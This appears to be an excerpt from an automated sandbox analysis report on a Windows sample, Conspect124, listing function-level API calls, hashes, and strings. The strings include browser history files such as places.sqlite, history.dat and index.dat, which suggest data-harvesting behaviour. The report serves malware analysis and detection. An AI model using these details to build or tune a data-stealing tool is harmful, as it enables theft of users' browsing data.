                                      • ??2@YAPAXI@Z.MSVCRT(00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0CC
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D0EA
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D108
                                      • ??2@YAPAXI@Z.MSVCRT(00000000,00000000,00000000,00000000,0040D142,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D126
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ??2@
                                      • String ID:
                                      • API String ID: 1033339047-0
                                      • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                      • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                      • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                      Function 00444B06 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 108COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                        • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                      • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$memcmp
                                      • String ID: $$8
                                      • API String ID: 2808797137-435121686
                                      • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                      • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                      • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                      Function 0040E4B2 Relevance: 4.6, APIs: 3, Instructions: 87fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                        • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                        • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                        • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                        • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                        • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                        • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                        • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                        • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                      • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                        • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                        • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                        • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,Function_0004E518,00000000,00000000,74DF2EE0), ref: 0040E3EC
                                      • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                      • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                        • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                        • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                        • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                      • String ID:
                                      • API String ID: 1979745280-0
                                      • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                      • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                      • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                      • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                      Function 00418758 Relevance: 4.6, APIs: 3, Instructions: 79COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00418680: GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                        • Part of subcall function 00418680: malloc.MSVCRT ref: 004186B7
                                        • Part of subcall function 00418680: free.MSVCRT ref: 004186C7
                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                      • GetDiskFreeSpaceW.KERNELBASE(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187D2
                                      • GetDiskFreeSpaceA.KERNEL32(00000000,?,00000200,?,?,?,00000000,?,00000000), ref: 004187FA
                                      • free.MSVCRT ref: 00418803
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: DiskFreeSpacefree$FullNamePathVersionmalloc
                                      • String ID:
                                      • API String ID: 1355100292-0
                                      • Opcode ID: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction ID: 9f5aa8738ec5ca8fa6c7af21032fcab0d24b7c3e7281463e4f88d86f77cdc7da
                                      • Opcode Fuzzy Hash: 7494654f5416982ac8b8eb6095e1b911d56786f256e13b4958c27deb7a97d588
                                      • Instruction Fuzzy Hash: 2A218776904118AEEB11EBA4CC849EF77BCEF05704F2404AFE551D7181EB784EC58769
                                      Function 00403A16 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                        • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                        • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                      • memset.MSVCRT ref: 00403A55
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                        • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                        • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                        • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                        • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                        • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                        • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                      • String ID: history.dat$places.sqlite
                                      • API String ID: 2641622041-467022611
                                      • Opcode ID: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                      • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                      • Opcode Fuzzy Hash: 4ee3c1f855ed567974f8c38ae52f347571c4e2ef0f255528624b3fdde4aab0c5
                                      • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                      Function 004175ED Relevance: 4.5, APIs: 3, Instructions: 49fileCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                        • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                      • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                      • GetLastError.KERNEL32 ref: 00417627
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$File$PointerRead
                                      • String ID:
                                      • API String ID: 839530781-0
                                      • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                      • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                      • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                      • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                      Function 0040C1D3 Relevance: 4.5, APIs: 1, Strings: 2, Instructions: 45COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: FileFindFirst
                                      • String ID: *.*$index.dat
                                      • API String ID: 1974802433-2863569691
                                      • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                      • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                      • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                      • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                      Function 00417570 Relevance: 4.5, APIs: 3, Instructions: 30COMMON
                                      Download Yara Rule
                                      APIs
                                      • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                      • GetLastError.KERNEL32 ref: 004175A2
                                      • GetLastError.KERNEL32 ref: 004175A8
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: ErrorLast$FilePointer
                                      • String ID:
                                      • API String ID: 1156039329-0
                                      • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                      • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                      • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                      Function 0040A02C Relevance: 4.5, APIs: 3, Instructions: 26filetimeCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                      • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                      • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$CloseCreateHandleTime
                                      • String ID:
                                      • API String ID: 3397143404-0
                                      • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                      • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                      • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                      Function 00409A45 Relevance: 4.5, APIs: 3, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                      • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: Temp$DirectoryFileNamePathWindows
                                      • String ID:
                                      • API String ID: 1125800050-0
                                      • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                      • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                      • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                      Function 004175B7 Relevance: 4.5, APIs: 2, Strings: 1, Instructions: 24sleepCOMMON
                                      Download Yara Rule
                                      APIs
                                      • Sleep.KERNEL32(00000064), ref: 004175D0
                                      • CloseHandle.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: CloseHandleSleep
                                      • String ID: }A
                                      • API String ID: 252777609-2138825249
                                      • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                      • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                      • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                      Function 004099F4 Relevance: 3.8, APIs: 3, Instructions: 38COMMON
                                      Download Yara Rule
                                      APIs
                                      • malloc.MSVCRT ref: 00409A10
                                      • memcpy.MSVCRT(00000000,00000000,00000000,00000000,?,0040A9F2,00000002,?,00000000,?,0040AD25,00000000,?,00000000), ref: 00409A28
                                      • free.MSVCRT ref: 00409A31
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: freemallocmemcpy
                                      • String ID:
                                      • API String ID: 3056473165-0
                                      • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                      • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                      • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                      Function 00437371 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 243COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: d
                                      • API String ID: 0-2564639436
                                      • Opcode ID: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                      • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                      • Opcode Fuzzy Hash: 2ea43a84bbc6b9850be7b521930e14c731786dace660299f5d5fb6de9ff2c6ec
                                      • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                      Function 0041EED2 Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 174COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: memset
                                      • String ID: BINARY
                                      • API String ID: 2221118986-907554435
                                      • Opcode ID: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                      • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                      • Opcode Fuzzy Hash: befda4f382f52914571534526ddb8b998123412eb8d39833d396fd974aa134d0
                                      • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                      Function 0041268E Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 72COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: _wcsicmp
                                      • String ID: /stext
                                      • API String ID: 2081463915-3817206916
                                      • Opcode ID: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                      • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                      • Opcode Fuzzy Hash: 43183885e7d34794edc347ee746a2fdce482efa4a93d67cd5162a7f7a47e1933
                                      • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                      Function 0040CC26 Relevance: 3.1, APIs: 2, Instructions: 53COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                      • GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB63
                                        • Part of subcall function 0040AB4A: MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,00000000,?,00000001,?,00401D51,00000000,00000001,00000000), ref: 0040AB88
                                      • CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                        • Part of subcall function 0040B04B: ??3@YAXPAX@Z.MSVCRT(00000000,0040AFD7,00000000,0040B608), ref: 0040B052
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: File$ByteCharMultiWide$??2@??3@CloseCreateHandleReadSize
                                      • String ID:
                                      • API String ID: 2445788494-0
                                      • Opcode ID: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                      • Instruction ID: dc8783d9a6c7baf78a377756874cfbd60b78407a6d3acdf6d1052ad5173bbb79
                                      • Opcode Fuzzy Hash: bdc6ff89a6972445fbf15f1c87a3cbc7fe705fee6098557394266cd6fc52cd88
                                      • Instruction Fuzzy Hash: 91118275804208AFDB10AF6ADC45C8A7F75FF01364711C27AF525A72A1D6349A18CBA5
                                      Function 004152C7 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 26COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      • failed to allocate %u bytes of memory, xrefs: 004152F0
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: malloc
                                      • String ID: failed to allocate %u bytes of memory
